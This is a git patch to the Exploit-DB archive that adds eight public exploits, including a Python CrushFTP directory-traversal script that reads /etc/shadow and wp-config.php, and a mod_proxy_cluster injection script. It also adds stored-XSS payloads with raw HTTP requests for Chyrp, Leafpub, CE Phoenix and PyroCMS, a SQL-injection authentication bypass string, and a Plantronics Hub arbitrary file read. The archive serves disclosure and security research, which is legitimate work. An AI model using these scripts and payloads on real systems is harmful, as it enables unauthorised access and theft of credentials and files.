From 9d17a3d6ca1aaecf63819d969d9453d71faf8893 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Tue, 14 May 2024 00:16:26 +0000
Subject: [PATCH] DB: 2024-05-14

10 changes to exploits/shellcodes/ghdb

CrushFTP < 11.1.0 - Directory Traversal

Apache mod_proxy_cluster - Stored XSS

CE Phoenix Version 1.0.8.20 - Stored XSS

Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)

Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)

Prison Management System - SQL Injection Authentication Bypass

PyroCMS v3.0.1 - Stored XSS

Plantronics Hub 3.25.1 - Arbitrary File Read
---
 exploits/multiple/remote/52012.py |  63 +++++++++++++++++
 exploits/php/webapps/52010.py     | 109 ++++++++++++++++++++++++++++++
 exploits/php/webapps/52013.txt    |  80 ++++++++++++++++++++++
 exploits/php/webapps/52014.txt    |  39 +++++++++++
 exploits/php/webapps/52015.txt    |  14 ++++
 exploits/php/webapps/52016.txt    |  17 +++++
 exploits/php/webapps/52017.txt    |  14 ++++
 exploits/windows/local/52011.txt  |  25 +++++++
 files_exploits.csv                |   8 +++
 ghdb.xml                          |  24 +++++++
 10 files changed, 393 insertions(+)
 create mode 100755 exploits/multiple/remote/52012.py
 create mode 100755 exploits/php/webapps/52010.py
 create mode 100644 exploits/php/webapps/52013.txt
 create mode 100644 exploits/php/webapps/52014.txt
 create mode 100644 exploits/php/webapps/52015.txt
 create mode 100644 exploits/php/webapps/52016.txt
 create mode 100644 exploits/php/webapps/52017.txt
 create mode 100644 exploits/windows/local/52011.txt

diff --git a/exploits/multiple/remote/52012.py b/exploits/multiple/remote/52012.py
new file mode 100755
index 0000000000..916570e343
--- /dev/null
+++ b/exploits/multiple/remote/52012.py
@@ -0,0 +1,63 @@
+## Exploit Title: CrushFTP Directory Traversal
+## Google Dork: N/A
+# Date: 2024-04-30
+# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
+## Vendor Homepage: https://www.crushftp.com/
+## Software Link: https://www.crushftp.com/download/
+## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)
+## Tested on: Windows10
+
+import requests
+import re
+
+# Regular expression to validate the URL
+def is_valid_url(url):
+    regex = re.compile(
+        r'^(?:http|ftp)s?://' # http:// or https://
+        r'(?:(?:A-Z0-9?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
+        r'localhost|' # localhost...
+        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4
+        r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6
+        r'(?::\d+)?' # optional: port
+        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
+    return re.match(regex, url) is not None
+
+# Function to scan for the vulnerability
+def scan_for_vulnerability(url, target_files):
+    print("Scanning for vulnerability in the following files:")
+    for target_file in target_files:
+        print(target_file)
+
+    for target_file in target_files:
+        try:
+            response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10)
+            if response.status_code == 200 and target_file.split('/')[-1] in response.text:
+                print("vulnerability detected in file", target_file)
+                print("Content of file", target_file, ":")
+                print(response.text)
+            else:
+                print("vulnerability not detected or unexpected response for file", target_file)
+        except requests.exceptions.RequestException as e:
+            print("Error connecting to the server:", e)
+
+# User input
+input_url = input("Enter the URL of the CrushFTP server: ")
+
+# Validate the URL
+if is_valid_url(input_url):
+    # Expanded list of allowed files
+    target_files = [
+        "/var/www/html/index.php",
+        "/var/www/html/wp-config.php",
+        "/etc/passwd",
+        "/etc/shadow",
+        "/etc/hosts",
+        "/etc/ssh/sshd_config",
+        "/etc/mysql/my.cnf",
+        # Add more files as needed
+
+    ]
+    # Start the scan
+    scan_for_vulnerability(input_url, target_files)
+else:
+    print("Invalid URL entered. Please enter a valid URL.")
\ No newline at end of file
diff --git a/exploits/php/webapps/52010.py b/exploits/php/webapps/52010.py
new file mode 100755
index 0000000000..649bee154e
--- /dev/null
+++ b/exploits/php/webapps/52010.py
@@ -0,0 +1,109 @@
+import requests
+import argparse
+from bs4 import BeautifulSoup
+from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
+from requests.exceptions import RequestException
+
+class Colors:
+    RED = '\033[91m'
+    GREEN = '\033[1;49;92m'
+    RESET = '\033[0m'
+
+def get_cluster_manager_url(base_url, path):
+    print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)
+    try:
+        response = requests.get(base_url + path)
+        response.raise_for_status()
+    except requests.exceptions.RequestException as e:
+        print(Colors.RED + f"Error: {e}" + Colors.RESET)
+        return None
+
+    print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)
+
+    if response.status_code == 200:
+        print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)
+        # Use BeautifulSoup to parse the HTML content
+        soup = BeautifulSoup(response.text, 'html.parser')
+
+        # Find all 'a' tags with 'href' attribute
+        all_links = soup.find_all('a', href=True)
+
+        # Search for the link containing the Alias parameter in the href attribute
+        cluster_manager_url = None
+        for link in all_links:
+            parsed_url = urlparse(link['href'])
+            query_params = parse_qs(parsed_url.query)
+            alias_value = query_params.get('Alias', [None])[0]
+
+            if alias_value:
+                print(Colors.GREEN + f"Alias value found" + Colors.RESET)
+                cluster_manager_url = link['href']
+                break
+
+        if cluster_manager_url:
+            print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)
+            return cluster_manager_url
+        else:
+            print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)
+            return None
+
+    print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")
+    return None
+
+def update_alias_value(url):
+    parsed_url = urlparse(url)
+    query_params = parse_qs(parsed_url.query, keep_blank_values=True)
+    query_params['Alias'] = ["<DedSec-47>"]
+    updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))
+    print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)
+    return updated_url
+
+def check_response_for_value(url, check_value):
+    response = requests.get(url)
+    if check_value in response.text:
+        print(Colors.RED + "Website is vulnerable POC by :")
+        print(Colors.GREEN + """
+          ____           _ ____                  _  _ _____
+         |  _ \  ___  __| / ___|  ___  ___      | || |___  |
+         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /
+         | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /
+         |____/ \___|\__,_|____/ \___|\___|        |_|/_/
+                                     github.com/DedSec-47    """)
+    else:
+        print(Colors.GREEN + "Website is not vulnerable POC by :")
+        print(Colors.GREEN + """
+          ____           _ ____                  _  _ _____
+         |  _ \  ___  __| / ___|  ___  ___      | || |___  |
+         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /
+         | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /
+         |____/ \___|\__,_|____/ \___|\___|        |_|/_/
+                                     github.com/DedSec-47    """)
+
+def main():
+    # Create a command-line argument parser
+    parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")
+
+    # Add a command-line argument for the target (-t/--target)
+    parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)
+
+    # Add a command-line argument for the URL path (-u/--url)
+    parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)
+
+    # Parse the command-line arguments
+    args = parser.parse_args()
+
+    # Get the cluster manager URL from the specified website
+    cluster_manager_url = get_cluster_manager_url(args.target, args.url)
+
+    # Check if the cluster manager URL is found
+    if cluster_manager_url:
+        # Modify the URL by adding the cluster manager value
+        modified_url = args.target + cluster_manager_url
+        modified_url = update_alias_value(args.target + cluster_manager_url)
+        print(Colors.GREEN + "Check executed successfully" + Colors.RESET)
+
+        # Check the response for the value "<DedSec-47>"
+        check_response_for_value(modified_url, "<DedSec-47>")
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/52013.txt b/exploits/php/webapps/52013.txt
new file mode 100644
index 0000000000..2175fa5aa6
--- /dev/null
+++ b/exploits/php/webapps/52013.txt
@@ -0,0 +1,80 @@
+# Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)
+# Date: 2024-04-24
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://github.com/chyrp/
+# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip
+# Version: 2.5.2
+# Tested on: MacOS
+
+### Steps to Reproduce ###
+
+- Login from the address: http://localhost/chyrp/?action=login.
+- Click on 'Write'.
+- Type this payload into the 'Title' field: "><img src=x onerror=alert(
+"Stored")>
+- Fill in the 'Body' area and click 'Publish'.
+- An alert message saying "Stored" will appear in front of you.
+
+### PoC Request ###
+
+POST /chyrp/admin/?action=add_post HTTP/1.1
+Host: localhost
+Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11;
+show_more_options=true
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
+Gecko/20100101 Firefox/124.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
+*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data;
+boundary=---------------------------28307567523233313132815561598
+Content-Length: 1194
+Origin: http://localhost
+Referer: http://localhost/chyrp/admin/?action=write_post
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="title"
+
+"><img src=x onerror=alert("Stored")>
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="body"
+
+<p>1337</p>
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="status"
+
+public
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="slug"
+
+
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="created_at"
+
+04/24/24 12:31:57
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="original_time"
+
+04/24/24 12:31:57
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="trackbacks"
+
+
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="feather"
+
+text
+-----------------------------28307567523233313132815561598
+Content-Disposition: form-data; name="hash"
+
+11e11aba15114f918ec1c2e6b8f8ddcf
+-----------------------------28307567523233313132815561598--
\ No newline at end of file
diff --git a/exploits/php/webapps/52014.txt b/exploits/php/webapps/52014.txt
new file mode 100644
index 0000000000..0d1c862d74
--- /dev/null
+++ b/exploits/php/webapps/52014.txt
@@ -0,0 +1,39 @@
+# Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)
+# Date: 2024-04-24
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://github.com/Leafpub
+# Software Link: https://github.com/Leafpub/leafpub
+# Version: 1.1.9
+# Tested on: MacOS
+
+### Steps to Reproduce ###
+
+- Please login from this address: http://localhost/leafpub/admin/login
+- Click on the Settings > Advanced
+- Enter the following payload into the "Custom Code" area and save it: ("><img
+src=x onerror=alert("Stored")>)
+- An alert message saying "Stored" will appear in front of you.
+
+### PoC Request ###
+
+POST /leafpub/api/settings HTTP/1.1
+Host: localhost
+Cookie:
+authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwlo
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
+Gecko/20100101 Firefox/124.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 476
+Origin: http://localhost
+Referer: http://localhost/leafpub/admin/settings
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+
+title=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on
\ No newline at end of file
diff --git a/exploits/php/webapps/52015.txt b/exploits/php/webapps/52015.txt
new file mode 100644
index 0000000000..c01729be3e
--- /dev/null
+++ b/exploits/php/webapps/52015.txt
@@ -0,0 +1,14 @@
+# Exploit Title: CE Phoenix Version 1.0.8.20  - Stored XSS
+# Date: 2023-11-25
+# Exploit Author: tmrswrr
+# Category : Webapps
+# Vendor Homepage: https://phoenixcart.org/
+# Version: v3.0.1
+# Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix
+
+## POC:
+
+1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
+2-Click edit and write in Title field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
+3-Save it and go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
+4-You will be see alert button
\ No newline at end of file
diff --git a/exploits/php/webapps/52016.txt b/exploits/php/webapps/52016.txt
new file mode 100644
index 0000000000..da379f6f44
--- /dev/null
+++ b/exploits/php/webapps/52016.txt
@@ -0,0 +1,17 @@
+# Exploit Title: PyroCMS v3.0.1  - Stored XSS
+# Date: 2023-11-25
+# Exploit Author: tmrswrr
+# Category : Webapps
+# Vendor Homepage: https://pyrocms.com/
+# Version: v3.0.1
+# Tested on: https://www.softaculous.com/apps/cms/PyroCMS
+
+
+
+----------------------------------------------------------------------------------------------------
+
+
+1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/1
+2-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
+3-Save it and go to this url : https://127.0.0.1/public/admin/redirects
+4-You will be see alert button
\ No newline at end of file
diff --git a/exploits/php/webapps/52017.txt b/exploits/php/webapps/52017.txt
new file mode 100644
index 0000000000..c79c9a1193
--- /dev/null
+++ b/exploits/php/webapps/52017.txt
@@ -0,0 +1,14 @@
+# Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass
+# Date: 15/03/2024
+# Exploit Author: Sanjay Singh
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html
+# Tested on: Windows ,XAMPP
+# CVE : CVE-2024-33288
+
+
+# Proof of Concept:
+Step 1-Visit http://localhost/prison/
+Step 2 - Click on Admin Dashboard button and redirect on login page.
+Step 3– Enter username as admin' or '1'='1 and password as 123456
+Step 4 – Click sing In and now you will be logged in as admin.
\ No newline at end of file
diff --git a/exploits/windows/local/52011.txt b/exploits/windows/local/52011.txt
new file mode 100644
index 0000000000..ac6adb9aa8
--- /dev/null
+++ b/exploits/windows/local/52011.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read
+# Date: 2024-05-10
+# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from
+Mastercard
+# Vendor Homepage:
+https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895
+# Version: Plantronics Hub for Windows version 3.25.1
+# Tested on: Windows 10/11
+# CVE : CVE-2024-27460
+
+As a regular user drop a file called "MajorUpgrade.config" inside the
+"C:\ProgramData\Plantronics\Spokes3G" directory. The content of
+MajorUpgrade.config should look like the following one liner:
+^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
+
+Exchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy
+(any file on the system). The desired file will be copied into C:\Program
+Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp
+
+Steps to reproduce (POC):
+- Open cmd.exe
+- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
+- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
+- Desired file will be copied into C:\Program Files
+(x86)\Plantronics\Spokes3G\UpdateServiceTemp
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 2a9ea76a7d..58d927a2f4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10813,6 +10813,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9039,exploits/multiple/remote/9039.txt,"cPanel - (Authenticated) 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,remote,multiple,,2009-06-28,2016-12-30,1,OSVDB-55515;CVE-2009-2275,,,,,
 21444,exploits/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0787;OSVDB-9240,,,,,https://www.securityfocus.com/bid/4717/info
 21445,exploits/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 - File Disclosure",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0786;OSVDB-14438,,,,,https://www.securityfocus.com/bid/4718/info
+52012,exploits/multiple/remote/52012.py,"CrushFTP < 11.1.0 - Directory Traversal",2024-05-13,"Abdualhadi khalifa",remote,multiple,,2024-05-13,2024-05-13,0,,,,,,
 38636,exploits/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",remote,multiple,,2012-11-07,2015-11-05,1,CVE-2013-2261;OSVDB-95000,,,,,https://www.securityfocus.com/bid/61090/info
 38637,exploits/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",remote,multiple,,2015-11-07,2015-11-05,1,CVE-2013-4103;OSVDB-95007,,,,,https://www.securityfocus.com/bid/61093/info
 31918,exploits/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure",2008-06-15,"Luigi Auriemma",remote,multiple,,2008-06-15,2014-02-27,1,CVE-2008-6737;OSVDB-46260,,,,,https://www.securityfocus.com/bid/29720/info
@@ -14115,6 +14116,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 27104,exploits/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-17,2013-07-26,1,CVE-2006-0310;OSVDB-22526,,,,,https://www.securityfocus.com/bid/16286/info
 20866,exploits/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",webapps,php,,2012-08-27,2012-08-27,0,OSVDB-85265;OSVDB-85264,,,,http://www.exploit-db.comaoop_0.3.6_minimal.rar,http://security.inshell.net/advisory/23
 12721,exploits/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion",2010-05-24,HC,webapps,php,,2010-05-23,2011-02-15,1,OSVDB-59001,,,,,
+52010,exploits/php/webapps/52010.py,"Apache mod_proxy_cluster - Stored XSS",2024-05-13,"Mohamed Mounir Boudjema",webapps,php,,2024-05-13,2024-05-13,0,,,,,,
 12330,exploits/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,"Lucas Apa",webapps,php,,2010-04-20,,1,CVE-2010-0432;OSVDB-64522;OSVDB-64521;OSVDB-64520;OSVDB-64519;OSVDB-64518;OSVDB-64517;OSVDB-64516,,,,,http://www.bonsai-sec.com/research/vulnerabilities/apacheofbiz-multiple-xss-0103.php
 42520,exploits/php/webapps/42520.txt,"Apache2Triad 1.5.4 - Multiple Vulnerabilities",2017-08-21,hyp3rlinx,webapps,php,,2017-08-21,2017-08-21,0,CVE-2017-12971;CVE-2017-12970;CVE-2017-12965,,,,,
 5471,exploits/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php' SQL Injection",2008-04-19,Crackers_Child,webapps,php,,2008-04-18,2016-11-24,1,OSVDB-44533;CVE-2008-1919,,,,,
@@ -15550,6 +15552,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11401,exploits/php/webapps/11401.txt,"CD Rentals Script - SQL Injection",2010-02-11,"Don Tukulesto",webapps,php,,2010-02-10,,1,OSVDB-62278;CVE-2010-0762,,,,,
 2540,exploits/php/webapps/2540.txt,"Cdsagenda 4.2.9 - 'SendAlertEmail.php' File Inclusion",2006-10-13,Drago84,webapps,php,,2006-10-12,2016-09-12,1,OSVDB-29735;CVE-2006-5384,,,,http://www.exploit-db.comcdsagenda-4.2.9.tar.gz,
 51957,exploits/php/webapps/51957.py,"CE Phoenix v1.0.8.20 - Remote Code Execution",2024-04-02,tmrswrr,webapps,php,,2024-04-02,2024-04-02,0,,,,,,
+52015,exploits/php/webapps/52015.txt,"CE Phoenix Version 1.0.8.20 - Stored XSS",2024-05-13,tmrswrr,webapps,php,,2024-05-13,2024-05-13,0,,,,,,
 22241,exploits/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 - Skin Configuration Script Remote File Inclusion",2003-02-09,MGhz,webapps,php,,2003-02-09,2012-10-25,1,CVE-2003-1410;OSVDB-5487,,,,,https://www.securityfocus.com/bid/6818/info
 22242,exploits/php/webapps/22242.txt,"Cedric Email Reader 0.4 - Global Configuration Script Remote File Inclusion",2003-02-09,MGhz,webapps,php,,2003-02-09,2012-10-25,1,CVE-2003-1411;OSVDB-5900,,,,,https://www.securityfocus.com/bid/6820/info
 29624,exploits/php/webapps/29624.txt,"CedStat 1.31 - 'index.php' Cross-Site Scripting",2007-02-21,sn0oPy,webapps,php,,2007-02-21,2013-11-16,1,CVE-2007-1020;OSVDB-33734,,,,,https://www.securityfocus.com/bid/22653/info
@@ -15720,6 +15723,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
 36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79456,,,,,https://www.securityfocus.com/bid/52115/info
 36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79455,,,,,https://www.securityfocus.com/bid/52117/info
+52013,exploits/php/webapps/52013.txt,"Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)",2024-05-13,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-13,2024-05-13,0,,,,,,
 35943,exploits/php/webapps/35943.txt,"Chyrp 2.x - '/admin/help.php' Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,Wireghoul,webapps,php,,2011-07-13,2015-01-29,1,CVE-2011-2743;OSVDB-73889,,,,,https://www.securityfocus.com/bid/48672/info
 35944,exploits/php/webapps/35944.txt,"Chyrp 2.x - '/includes/JavaScript.php?action' Cross-Site Scripting",2011-07-13,Wireghoul,webapps,php,,2011-07-13,2015-01-29,1,CVE-2011-2743;OSVDB-73888,,,,,https://www.securityfocus.com/bid/48672/info
 35946,exploits/php/webapps/35946.txt,"Chyrp 2.x - '/includes/lib/gz.php?File' Traversal Arbitrary File Access",2011-07-29,Wireghoul,webapps,php,,2011-07-29,2015-01-29,1,CVE-2011-2780;OSVDB-73891,,,,,https://www.securityfocus.com/bid/48672/info
@@ -22529,6 +22533,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5887,exploits/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,,1,OSVDB-46498;CVE-2008-2833,,,,,
 36647,exploits/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,webapps,php,,2012-01-21,2015-04-06,1,CVE-2012-0932;OSVDB-78455,,,,,https://www.securityfocus.com/bid/51785/info
 51471,exploits/php/webapps/51471.txt,"LeadPro CRM v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
+52014,exploits/php/webapps/52014.txt,"Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)",2024-05-13,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-13,2024-05-13,0,,,,,,
 11889,exploits/php/webapps/11889.txt,"leaftec CMS - Multiple Vulnerabilities",2010-03-26,Valentin,webapps,php,,2010-03-25,,1,OSVDB-63417;OSVDB-63416,,,,,
 8576,exploits/php/webapps/8576.pl,"Leap CMS 0.1.4 - 'searchterm' Blind SQL Injection",2009-04-30,YEnH4ckEr,webapps,php,,2009-04-29,,1,OSVDB-54405;CVE-2009-1613,,,,,
 8577,exploits/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,webapps,php,,2009-04-29,,1,OSVDB-54405;CVE-2009-1615;OSVDB-54404;CVE-2009-1614;OSVDB-54403;OSVDB-54402;CVE-2009-1613,,,,,
@@ -28364,6 +28369,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28264,exploits/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion",2006-07-24,OLiBekaS,webapps,php,,2006-07-24,2013-09-13,1,,,,,,https://www.securityfocus.com/bid/19138/info
 31164,exploits/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' SQL Injection",2008-02-12,S@BUN,webapps,php,,2008-02-12,2014-01-23,1,,,,,,https://www.securityfocus.com/bid/27761/info
 49877,exploits/php/webapps/49877.txt,"Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection",2021-05-17,bwnz,webapps,php,,2021-05-17,2021-10-29,0,,,,,,
+52017,exploits/php/webapps/52017.txt,"Prison Management System - SQL Injection Authentication Bypass",2024-05-13,"Sanjay Singh",webapps,php,,2024-05-13,2024-05-13,0,,,,,,
 6639,exploits/php/webapps/6639.txt,"Pritlog 0.4 - 'Filename' Remote File Disclosure",2008-09-30,Pepelux,webapps,php,,2008-09-29,,1,OSVDB-48655;CVE-2008-6012,,,,,
 44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,,2018-05-21,2018-05-22,0,,,,,,
 23486,exploits/php/webapps/23486.txt,"Private Message System 2.x - 'index.php?Page' Cross-Site Scripting",2003-12-27,"David S. Ferreira",webapps,php,,2003-12-27,2012-12-18,1,,,,,,https://www.securityfocus.com/bid/9308/info
@@ -28572,6 +28578,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23060,exploits/php/webapps/23060.txt,"Py-Membres 4.x - 'Secure.php' Unauthorized Access",2003-08-26,frog,webapps,php,,2003-08-26,2012-12-02,1,,,,,,https://www.securityfocus.com/bid/8499/info
 46206,exploits/php/webapps/46206.txt,"Pydio / AjaXplorer < 5.0.4 - (Unauthenticated) Arbitrary File Upload",2019-01-18,_jazz______,webapps,php,80,2019-01-18,2019-03-17,0,CVE-2013-6227,,,,http://www.exploit-db.comajaxplorer-core-4.2.3.tar.gz,
 18985,exploits/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,webapps,php,,2012-06-05,2012-06-05,0,OSVDB-82636;OSVDB-82626,,,,http://www.exploit-db.compyrocms-pyrocms-v2.1.1-0-ge5f0c6b.tar.gz,http://www.pyrocms.com/store/details/pyrocms_professional
+52016,exploits/php/webapps/52016.txt,"PyroCMS v3.0.1 - Stored XSS",2024-05-13,tmrswrr,webapps,php,,2024-05-13,2024-05-13,0,,,,,,
 29631,exploits/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 - Cross-Site Scripting",2007-02-22,"laurent gaffie",webapps,php,,2007-02-22,2017-02-14,1,CVE-2007-1159;OSVDB-36879,,,,,https://www.securityfocus.com/bid/22667/info
 8095,exploits/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,webapps,php,,2009-02-22,,1,,,,,,
 29632,exploits/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",webapps,php,,2007-02-22,2017-02-14,1,CVE-2007-1152;OSVDB-37398,,,,,https://www.securityfocus.com/bid/22667/info
@@ -41470,6 +41477,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows,,2020-01-03,2020-02-10,1,,,,,,
